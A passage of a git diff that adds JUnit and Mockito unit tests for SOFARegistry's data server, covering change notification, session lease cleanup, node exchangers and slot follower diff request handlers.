com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.List; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class DataChangeEventCenterTest { + private static final String DC = "testDc"; + private DataChangeEventCenter center; + private DataServerConfig dataServerConfig; + private DatumCache datumCache; + + private void setCenter() { + this.center = new DataChangeEventCenter(); + this.dataServerConfig = TestBaseUtils.newDataConfig(DC); + this.datumCache = TestBaseUtils.newLocalDatumCache(DC, true); + center.setDataServerConfig(dataServerConfig); + center.setDatumCache(datumCache); + } + + @Test + public void testHandleTempChangeNotInit() { + setCenter(); + Assert.assertFalse(center.handleTempChanges(Collections.EMPTY_LIST)); + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + center.onTempPubChange(pub, DC); + Assert.assertFalse(center.handleTempChanges(Collections.EMPTY_LIST)); + + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + center.onTempPubChange(pub, DC); + // npe + Assert.assertTrue(center.handleTempChanges(Lists.newArrayList(channel))); + + // reject + center.setNotifyTempExecutor(TestBaseUtils.rejectExecutor()); + center.onTempPubChange(pub, DC); + double pre = ChangeMetrics.CHANGETEMP_SKIP_COUNTER.get(); + Assert.assertTrue(center.handleTempChanges(Lists.newArrayList(channel))); + Assert.assertTrue(ChangeMetrics.CHANGETEMP_SKIP_COUNTER.get() == (pre + 1)); + } + + @Test + public void testHandleChangeNotInit() { + setCenter(); + Assert.assertFalse(center.handleChanges(Collections.EMPTY_LIST)); + + List changes1 = Lists.newArrayList("1", "2"); + center.onChange(changes1, DC); + Assert.assertFalse(center.handleChanges(Collections.EMPTY_LIST)); + + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + center.onChange(changes1, DC); + Assert.assertTrue(center.handleChanges(Lists.newArrayList(channel))); + + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + center.onChange(Lists.newArrayList(pub.getDataInfoId()), DC); + datumCache.getLocalDatumStorage().put(pub); + // npe + Assert.assertTrue(center.handleChanges(Lists.newArrayList(channel))); + + // reject + center.setNotifyExecutor(TestBaseUtils.rejectExecutor()); + center.onChange(Lists.newArrayList(pub.getDataInfoId()), DC); + double pre = ChangeMetrics.CHANGE_SKIP_COUNTER.get(); + Assert.assertTrue(center.handleChanges(Lists.newArrayList(channel))); + Assert.assertTrue(ChangeMetrics.CHANGE_SKIP_COUNTER.get() == (pre + 1)); + } + + @Test + public void testNotify() { + setCenter(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + channel.setActive(false); + DataChangeEventCenter.ChangeNotifier notifier = + center.newChangeNotifier( + channel, DC, Collections.singletonMap(String.valueOf(100), new DatumVersion(100))); + + double pre = CHANGE_FAIL_COUNTER.get(); + notifier.run(); + Assert.assertTrue(CHANGE_FAIL_COUNTER.get() == (pre + 1)); + + channel.setActive(true); + Exchange exchange = Mockito.mock(BoltExchange.class); + Mockito.when(exchange.getServer(Mockito.anyInt())).thenReturn(Mockito.mock(Server.class)); + center.setExchange(exchange); + + pre = CHANGE_FAIL_COUNTER.get(); + double spre = CHANGE_SUCCESS_COUNTER.get(); + notifier.run(); + Assert.assertTrue(CHANGE_FAIL_COUNTER.get() == (pre)); + Assert.assertTrue(CHANGE_SUCCESS_COUNTER.get() == (spre + 1)); + } + + @Test + public void testTempNotify() { + setCenter(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + + DataChangeEventCenter.TempNotifier notifier = center.newTempNotifier(channel, null); + + // channel close + channel.setActive(false); + double pre = CHANGETEMP_FAIL_COUNTER.get(); + notifier.run(); + System.out.println(pre + ":" + CHANGETEMP_FAIL_COUNTER.get()); + Assert.assertTrue(CHANGETEMP_FAIL_COUNTER.get() == (pre + 1)); + + channel.setActive(true); + + // npe + pre = CHANGETEMP_FAIL_COUNTER.get(); + notifier.run(); + Assert.assertTrue(CHANGETEMP_FAIL_COUNTER.get() == (pre + 1)); + + // success + Datum datum = new Datum(); + datum.setDataCenter("testDc"); + datum.setDataInfoId("testDataInfoId"); + notifier = center.newTempNotifier(channel, datum); + pre = CHANGETEMP_FAIL_COUNTER.get(); + double spre = CHANGETEMP_SUCCESS_COUNTER.get(); + notifier.run(); + Assert.assertTrue(CHANGETEMP_FAIL_COUNTER.get() == (pre)); + Assert.assertTrue(CHANGETEMP_SUCCESS_COUNTER.get() == (spre + 1)); + } + + @Test + public void testHandleExpire_npe() { + initHandleExpire(); + center.handleExpire(); + } + + @Test + public void testHandleExpire_reject() { + initHandleExpire(); + center.setNotifyExecutor(TestBaseUtils.rejectExecutor()); + center.handleExpire(); + } + + private void initHandleExpire() { + setCenter(); + dataServerConfig.setNotifyRetryQueueSize(10); + // not expire + dataServerConfig.setNotifyRetryBackoffMillis(100000); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + List list = Lists.newArrayList(); + for (int i = 0; i < dataServerConfig.getNotifyRetryQueueSize(); i++) { + center.commitRetry( + center.newChangeNotifier( + channel, DC, Collections.singletonMap(String.valueOf(i), new DatumVersion(100)))); + list.add( + center.newChangeNotifier( + channel, + DC, + Collections.singletonMap(String.valueOf(i + 100), new DatumVersion(200)))); + } + List expires = center.getExpires(); + Assert.assertTrue(expires.isEmpty()); + // is full, make expire now + dataServerConfig.setNotifyRetryBackoffMillis(0); + for (DataChangeEventCenter.ChangeNotifier n : list) { + center.commitRetry(n); + } + expires = center.getExpires(); + Assert.assertEquals(expires.size(), list.size()); + Assert.assertArrayEquals(expires.toArray(), list.toArray()); + for (DataChangeEventCenter.ChangeNotifier n : list) { + center.commitRetry(n); + } + } + + @Test + public void testOnTempChange() { + setCenter(); + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + center.onTempPubChange(pub, DC); + Datum datum = center.getOnTempPubChanges(DC).get(pub.getDataInfoId()); + Assert.assertEquals(datum.publisherSize(), 1); + Assert.assertEquals(datum.getPubMap().get(pub.getRegisterId()), pub); + + center.onTempPubChange(pub, DC); + Publisher older = TestBaseUtils.cloneBase(pub); + older.setRegisterTimestamp(older.getRegisterTimestamp() - 1); + center.onTempPubChange(older, DC); + datum = center.getOnTempPubChanges(DC).get(pub.getDataInfoId()); + Assert.assertEquals(datum.publisherSize(), 1); + Assert.assertEquals(datum.getPubMap().get(pub.getRegisterId()), pub); + + Publisher newer = TestBaseUtils.cloneBase(pub); + newer.setRegisterTimestamp(newer.getRegisterTimestamp() + 1); + center.onTempPubChange(newer, DC); + datum = center.getOnTempPubChanges(DC).get(pub.getDataInfoId()); + Assert.assertEquals(datum.publisherSize(), 1); + Assert.assertEquals(datum.getPubMap().get(pub.getRegisterId()), newer); + + datum = center.getOnTempPubChanges(DC + "1").get(pub.getDataInfoId()); + Assert.assertNull(datum); + + Publisher pub2 = TestBaseUtils.createTestPublisher("testDataId"); + center.onTempPubChange(pub2, DC); + datum = center.getOnTempPubChanges(DC).get(pub.getDataInfoId()); + Assert.assertEquals(datum.publisherSize(), 2); + Assert.assertEquals(datum.getPubMap().get(pub.getRegisterId()), newer); + Assert.assertEquals(datum.getPubMap().get(pub2.getRegisterId()), pub2); + } + + @Test + public void testTransfer() { + setCenter(); + List changes1 = Lists.newArrayList("1", "2", "3"); + center.onChange(changes1, DC); + List events = center.transferChangeEvent(3); + Assert.assertNotNull(events.get(0).toString()); + Assert.assertEquals(1, events.size()); + assertEvent(events, changes1); + + center.onChange(changes1, DC); + events = center.transferChangeEvent(2); + Assert.assertEquals(2, events.size()); + assertEvent(events, changes1); + } + + private void assertEvent(List events, List changes) { + List elist = Lists.newArrayList(); + for (DataChangeEvent e : events) { + elist.addAll(e.getDataInfoIds()); + } + Assert.assertEquals(elist.size(), changes.size()); + Assert.assertEquals(Sets.newHashSet(elist), Sets.newHashSet(changes)); + } + + @Test + public void testOnChange() { + setCenter(); + List changes1 = Lists.newArrayList("1", "2"); + center.onChange(changes1, DC); + + List changes2 = Lists.newArrayList("2", "3"); + center.onChange(changes2, DC); + + List changes3 = Lists.newArrayList("4", "5"); + center.onChange(changes3, DC + "1"); + + Set s1 = Sets.newHashSet(changes1); + s1.addAll(changes2); + + Assert.assertEquals(center.getOnChanges(DC), s1); + Assert.assertEquals(center.getOnChanges(DC + "1"), Sets.newHashSet(changes3)); + Assert.assertEquals(center.getOnChanges(DC + "2"), Collections.emptySet()); + } + + @Test + public void testInit() throws Exception { + setCenter(); + // set center exchange + Exchange exchange = Mockito.mock(Exchange.class); + Server server = Mockito.mock(Server.class); + Mockito.when(exchange.getServer(dataServerConfig.getNotifyPort())).thenReturn(server); + + center.setExchange(exchange); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 1000); + channel.setActive(false); + Assert.assertFalse(channel.isConnected()); + + Mockito.when(server.selectAvailableChannelsForHostAddress()) + .thenReturn( + Collections.singletonMap( + channel.getRemoteAddress().getAddress().getHostAddress(), channel)); + Mockito.when(server.sendSync(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyInt())) + .thenThrow(new UnsupportedOperationException()); + + Publisher pub = TestBaseUtils.createTestPublisher("testDataId"); + datumCache.getLocalDatumStorage().put(pub); + + center.init(); + this.dataServerConfig.setNotifyRetryBackoffMillis(1); + this.dataServerConfig.setNotifyRetryTimes(1); + + center.onChange(Lists.newArrayList(pub.getDataInfoId()), DC); + center.onTempPubChange(pub, DC); + Thread.sleep(2000); + + channel.setActive(true); + Assert.assertTrue(channel.isConnected()); + + center.onChange(Lists.newArrayList(pub.getDataInfoId()), DC); + center.onTempPubChange(pub, DC); + Thread.sleep(2000); + + center.onChange(Lists.newArrayList(pub.getDataInfoId()), DC); + center.onTempPubChange(pub, DC); + Thread.sleep(2000); + Mockito.verify(server, Mockito.times(6)) + .sendSync(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyInt()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManagerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManagerTest.java new file mode 100644 index 000000000..358db4911 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManagerTest.java @@ -0,0 +1,168 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.lease; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.CleanContinues; +import com.alipay.sofa.registry.server.data.cache.LocalDatumStorage; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SessionLeaseManagerTest { + @Test(expected = IllegalArgumentException.class) + public void testValidate() { + SessionLeaseManager slm = new SessionLeaseManager(); + slm.validateSessionLeaseSec(1); + } + + @Test + public void test() throws Exception { + SessionLeaseManager slm = new SessionLeaseManager(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + slm.dataServerConfig = cfg; + slm.metaServerService = Mockito.mock(MetaServerService.class); + slm.slotManager = mockSM(); + Exchange boltExchange = Mockito.mock(BoltExchange.class); + slm.boltExchange = boltExchange; + Set processIds = slm.getProcessIdsInConnection(); + Assert.assertTrue(processIds.isEmpty()); + + Server server = Mockito.mock(Server.class); + Mockito.when(boltExchange.getServer(Mockito.anyInt())).thenReturn(server); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "127.0.0.1", 2222); + channel.setActive(true); + channel.conn.setAttribute(ValueConstants.ATTR_RPC_CHANNEL_PROCESS_ID, ServerEnv.PROCESS_ID); + Mockito.when(server.getChannels()).thenReturn(Lists.newArrayList(channel)); + + processIds = slm.getProcessIdsInConnection(); + Assert.assertEquals(processIds.size(), 1); + Assert.assertTrue(processIds.contains(ServerEnv.PROCESS_ID)); + + LocalDatumStorage storage = TestBaseUtils.newLocalStorage("testDc", true); + slm.localDatumStorage = storage; + DataServerConfig config = storage.getDataServerConfig(); + config.setSessionLeaseCheckIntervalSecs(1); + config.setDatumCompactDelaySecs(1); + config.setSessionLeaseSecs(1); + slm.dataServerConfig = config; + slm.renewSession(ServerEnv.PROCESS_ID); + Assert.assertTrue(slm.contains(ServerEnv.PROCESS_ID)); + Publisher p = TestBaseUtils.createTestPublisher("dataId"); + storage.put(p); + Assert.assertEquals(storage.get(p.getDataInfoId()).getPubMap().get(p.getRegisterId()), p); + // wait to clean, but connection remains + Thread.sleep(1500); + slm.clean(); + Assert.assertTrue(slm.contains(ServerEnv.PROCESS_ID)); + Assert.assertEquals(storage.tombstoneNum(), 0); + Assert.assertEquals(storage.get(p.getDataInfoId()).getPubMap().get(p.getRegisterId()), p); + + // reset the connections + Mockito.when(server.getChannels()).thenReturn(Collections.emptyList()); + Thread.sleep(1500); + // wait to clean + slm.clean(); + Assert.assertFalse(slm.contains(ServerEnv.PROCESS_ID)); + Assert.assertEquals(storage.tombstoneNum(), 0); + Assert.assertEquals(storage.get(p.getDataInfoId()).publisherSize(), 0); + + // wait to compact + Thread.sleep(1500); + slm.clean(); + Assert.assertEquals(storage.tombstoneNum(), 0); + Assert.assertEquals(storage.get(p.getDataInfoId()).publisherSize(), 0); + } + + @Test + public void testLoop() throws Exception { + SessionLeaseManager slm = new SessionLeaseManager(); + BoltExchange boltExchange = Mockito.mock(BoltExchange.class); + slm.boltExchange = boltExchange; + slm.metaServerService = Mockito.mock(MetaServerService.class); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + slm.dataServerConfig = cfg; + slm.slotManager = mockSM(); + Server server = Mockito.mock(Server.class); + Mockito.when(boltExchange.getServer(Mockito.anyInt())).thenReturn(server); + Mockito.when(server.getChannels()).thenReturn(Collections.emptyList()); + + LocalDatumStorage storage = TestBaseUtils.newLocalStorage("testDc", true); + slm.localDatumStorage = storage; + DataServerConfig config = storage.getDataServerConfig(); + config.setSessionLeaseCheckIntervalSecs(1); + config.setDatumCompactDelaySecs(1); + config.setSessionLeaseSecs(5); + slm.dataServerConfig = config; + slm.init(); + slm.renewSession(ServerEnv.PROCESS_ID); + Assert.assertTrue(slm.contains(ServerEnv.PROCESS_ID)); + Publisher p = TestBaseUtils.createTestPublisher("dataId"); + storage.put(p); + Assert.assertEquals(storage.get(p.getDataInfoId()).getPubMap().get(p.getRegisterId()), p); + // wait to clean + config.setSessionLeaseSecs(1); + Thread.sleep(2000); + Assert.assertEquals(storage.tombstoneNum(), 0); + Assert.assertEquals(storage.get(p.getDataInfoId()).publisherSize(), 0); + + // put again + storage.put(p); + Assert.assertEquals(storage.get(p.getDataInfoId()).publisherSize(), 1); + Mockito.when(slm.metaServerService.getSessionProcessIds()) + .thenReturn(Sets.newHashSet(ServerEnv.PROCESS_ID)); + // could not clean + slm.cleanStorage(); + Assert.assertEquals(storage.get(p.getDataInfoId()).publisherSize(), 1); + } + + @Test + public void testContinues() throws Exception { + CleanContinues always = CleanContinues.ALWAYS; + Assert.assertTrue(always.continues()); + always.onClean(100); + Assert.assertTrue(always.continues()); + + long now = System.currentTimeMillis(); + CleanContinues c = new SessionLeaseManager.CleanLeaseContinues(now + 1000); + Assert.assertTrue(c.continues()); + Thread.sleep(1001); + Assert.assertTrue(c.continues()); + c.onClean(1); + Assert.assertFalse(c.continues()); + } + + private SlotManager mockSM() { + SlotManager slotManager = Mockito.mock(SlotManager.class); + Mockito.when(slotManager.isLeader(Mockito.anyInt())).thenReturn(true); + return slotManager; + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManagerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManagerTest.java new file mode 100644 index 000000000..93e92442c --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataMetaServerManagerTest.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting; + +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import org.junit.Assert; +import org.junit.Test; + +public class DataMetaServerManagerTest { + private DataMetaServerManager dataMetaServerManager; + private DataServerConfig cfg; + + private void init() { + dataMetaServerManager = new DataMetaServerManager(); + cfg = TestBaseUtils.newDataConfig("testDc"); + dataMetaServerManager.setDataServerConfig(cfg); + } + + @Test + public void testConfig() { + init(); + Assert.assertEquals(1, dataMetaServerManager.getConnNum()); + Assert.assertEquals(cfg.getMetaServerPort(), dataMetaServerManager.getServerPort()); + Assert.assertEquals(cfg.getRpcTimeoutMillis(), dataMetaServerManager.getRpcTimeoutMillis()); + } + + @Test + public void test() {} +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchangerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchangerTest.java new file mode 100644 index 000000000..6d27fbbb8 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/DataNodeExchangerTest.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting; + +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import org.junit.Assert; +import org.junit.Test; + +public class DataNodeExchangerTest { + @Test + public void test() { + DataNodeExchanger dataNodeExchanger = new DataNodeExchanger(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + dataNodeExchanger.setDataServerConfig(cfg); + + Assert.assertEquals(cfg.getSyncDataConnNum(), dataNodeExchanger.getConnNum()); + Assert.assertEquals(cfg.getSyncDataPort(), dataNodeExchanger.getServerPort()); + Assert.assertEquals(cfg.getRpcTimeoutMillis(), dataNodeExchanger.getRpcTimeoutMillis()); + Assert.assertEquals(0, dataNodeExchanger.getClientHandlers().size()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchangerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchangerTest.java new file mode 100644 index 000000000..094746993 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/SessionNodeExchangerTest.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting; + +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import org.junit.Assert; +import org.junit.Test; + +public class SessionNodeExchangerTest { + @Test + public void test() { + SessionNodeExchanger sessionNodeExchanger = new SessionNodeExchanger(); + DataServerConfig cfg = TestBaseUtils.newDataConfig("testDc"); + sessionNodeExchanger.setDataServerConfig(cfg); + + Assert.assertEquals(cfg.getSyncSessionConnNum(), sessionNodeExchanger.getConnNum()); + Assert.assertEquals(cfg.getSyncSessionPort(), sessionNodeExchanger.getServerPort()); + Assert.assertEquals(cfg.getRpcTimeoutMillis(), sessionNodeExchanger.getRpcTimeoutMillis()); + Assert.assertEquals(0, sessionNodeExchanger.getClientHandlers().size()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandlerTest.java new file mode 100644 index 000000000..60199c627 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandlerTest.java @@ -0,0 +1,97 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class SlotFollowerDiffDigestRequestHandlerTest { + + @Test + public void testCheckParam() { + SlotFollowerDiffDigestRequestHandler handler = newHandler(); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(-1, Collections.emptyMap())); + }); + + handler.checkParam(request(1, null)); + handler.checkParam(request(1, Collections.emptyMap())); + } + + private SlotFollowerDiffDigestRequestHandler newHandler() { + SlotFollowerDiffDigestRequestHandler handler = new SlotFollowerDiffDigestRequestHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), DataSlotDiffDigestRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + GenericResponse failed = (GenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + SlotManager slotManager = mock(SlotManager.class); + handler.setSlotManager(slotManager); + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + handler.setLocalDatumStorage(datumCache.getLocalDatumStorage()); + return handler; + } + + @Test + public void testHandle() { + SlotFollowerDiffDigestRequestHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + DataSlotDiffDigestRequest request = request(1, Collections.emptyMap()); + + // not leader + when(handler.getSlotManager().isLeader(anyInt())).thenReturn(false); + GenericResponse resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + + // is leader + when(handler.getSlotManager().isLeader(anyInt())).thenReturn(true); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertNotNull(resp.getData()); + + // npe + handler.setSlotManager(null); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + } + + private static DataSlotDiffDigestRequest request( + int slotId, Map datumDigest) { + return new DataSlotDiffDigestRequest(1, slotId, datumDigest); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandlerTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandlerTest.java new file mode 100644 index 000000000..e70073821 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandlerTest.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class SlotFollowerDiffPublisherRequestHandlerTest { + @Test + public void testCheckParam() { + SlotFollowerDiffPublisherRequestHandler handler = newHandler(); + TestBaseUtils.assertException( + IllegalArgumentException.class, + () -> { + handler.checkParam(request(-1, Collections.emptyList())); + }); + + handler.checkParam(request(1, null)); + handler.checkParam(request(1, Collections.emptyList())); + } + + private SlotFollowerDiffPublisherRequestHandler newHandler() { + SlotFollowerDiffPublisherRequestHandler handler = new SlotFollowerDiffPublisherRequestHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), DataSlotDiffPublisherRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + GenericResponse failed = (GenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + SlotManager slotManager = mock(SlotManager.class); + handler.setSlotManager(slotManager); + DatumCache datumCache = TestBaseUtils.newLocalDatumCache("testDc", true); + handler.setLocalDatumStorage(datumCache.getLocalDatumStorage()); + handler.setDataServerConfig(TestBaseUtils.newDataConfig("testDc")); + return handler; + } + + @Test + public void testHandle() { + SlotFollowerDiffPublisherRequestHandler handler = newHandler(); + TestBaseUtils.MockBlotChannel channel = TestBaseUtils.newChannel(9620, "localhost", 8888); + + DataSlotDiffPublisherRequest request = request(1, Collections.emptyList()); + + // not leader + when(handler.getSlotManager().isLeader(anyInt())).thenReturn(false); + GenericResponse resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + + // is leader + when(handler.getSlotManager().isLeader(anyInt())).thenReturn(true); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + 